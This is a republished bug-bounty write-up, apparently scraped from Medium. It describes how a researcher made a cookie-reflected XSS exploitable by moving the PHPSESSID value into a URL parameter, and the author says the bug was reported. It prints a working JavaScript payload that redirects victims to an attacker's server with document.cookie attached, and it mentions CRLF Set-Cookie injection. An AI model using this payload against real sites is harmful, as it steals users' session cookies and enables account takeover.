Cookie based injection XSS making explitable with exploiting other vulns

medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 22 hours ago · bug-bounty
quality 5/10 · average
0 net
AI Summary

A researcher discovered a cookie-based XSS vulnerability that became exploitable by moving the vulnerable cookie parameter into URL GET parameters, allowing them to exfiltrate session cookies without needing to chain additional vulnerabilities like CRLF injection.

Tags
xss cookie-injection parameter-reflection burp-suite bug-bounty web-application-security payload-encoding url-parameter-manipulation
Entities
Utkarsh Agrawal Burp Suite PHPSESSID
Cookie-based-injection XSS making exploitable with-out exploiting other Vulns. | by Utkarsh Agrawal - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original Cookie-based-injection XSS making exploitable with-out exploiting other Vulns. Hi all, Utkarsh Agrawal Follow ~2 min read · October 22, 2018 (Updated: October 22, 2018) · Free: Yes Cookie-based-injection XSS making exploitable with-out exploiting other Vulns. This is a short blog post about making exploitable Cookie based XSS. I was testing a site [redacted.com] can't take name for Obvious reasons. I was testing it on the Repeater tab on the burp and testing a parameter which was reflecting back on the HTML page but encoded. URL:- http:// [redacted.com] /path/file.php?f=a*&location =12 * was the injection point I was trying. I was trying to bypass the filter by injecting different payload again and again (means sending requests again and again) and all of the sudden I got another parameter reflected on the page which was cookie parameter which was not reflected before. How? Frankly I don't know ? I was literally surprised that How I got this new parameter reflected on the page and why not before. Okay go on, now I started to see if that cookie parameter can be injected or not and to my surprised it was inject-able. Now I got XSS injection point but the main thing is How Can I exploit it against users ? For making cookie based XSS injection exploitable you might need to exploit another vulnerability i.e. CRLF (because you can then try %0d%0aSet-Cookie). I tried to find out but didn't get it. Next I got an idea what if I place that Cookie paramete r into the URL GET parameters like this:- http://[redacted.com]/path/file.php?f=a&location =12&PHPSESSID={payload} payload:- a');document.location=" http://myserver/ "%2bdocument.cookie;test('. and yeah it works the same. Wow! I got all the cookies on my server. I quickly reported it to the team. :) It was a good case for me. AND one thing I got to learn is that if you got cookie based injection then you should also check by replace the parameter from cookie header to URL parameter like when you do POST to GET to make easy exploitable. Thanks #javascript #xss-attack #html #bug-bounty #cookies Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).
← Back to stories